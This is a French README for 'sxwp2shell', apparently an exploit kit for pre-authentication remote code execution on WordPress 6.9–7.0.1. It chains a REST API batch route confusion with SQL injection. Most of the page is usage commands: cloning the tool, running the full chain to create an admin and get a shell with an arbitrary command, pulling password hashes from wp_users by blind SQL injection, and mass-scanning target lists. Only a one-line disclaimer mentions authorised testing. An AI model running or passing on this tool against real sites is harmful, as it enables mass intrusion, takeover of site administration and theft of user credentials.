
Kit d'exploitation RCE pre-auth pour WordPress wp2shell (CVE-2026-63030 + CVE-2026-60137)
/ ___/___ ____ / /_(_)___ ___ / / | |/ /
\__ \/ _ \/ __ \/ __/ / __ \/ _ \/ / | /
___/ / __/ / / / /_/ / / / / __/ /___/ |
/____/\___/_/ /_/\__/_/_/ /_/\___/_____/_/|_|
sxwp2shell — Exploit RCE sans authentification pour WordPress via une confusion de routes batch de l'API REST (CVE-2026-63030) + injection SQL (CVE-2026-60137).
Versions concernées : WP 6.9.0–6.9.4 / 7.0.0–7.0.1
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py
Python 3.7+, bibliothèque standard uniquement — aucune installation pip requise.
| Commande | Description |
|---|---|
check <url> | Détecte la version, l'endpoint batch, la confusion de routes et l'injection SQL |
exploit <url> | Chaîne RCE complète (SQLi → création d'admin → shell) |
read <url> | Extraction de données par injection SQL aveugle |
scan <file> | Analyse massive de cibles depuis un fichier, export CSV |
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv
--cmd CMD Commande à exécuter (défaut : id)
--query QUERY Requête SQL personnalisée
-k, --insecure Ignorer la vérification SSL
--proxy PROXY Proxy HTTP
--timeout SEC Délai d'expiration des requêtes (défaut : 15)
--delay SEC Délai entre les requêtes
--agent AGENT User-Agent personnalisé
--no-color Désactiver la sortie colorée
-o, --output Enregistrer les résultats d'analyse en CSV
Pour tests de sécurité autorisés uniquement. Lisez DISCLAIMER.md.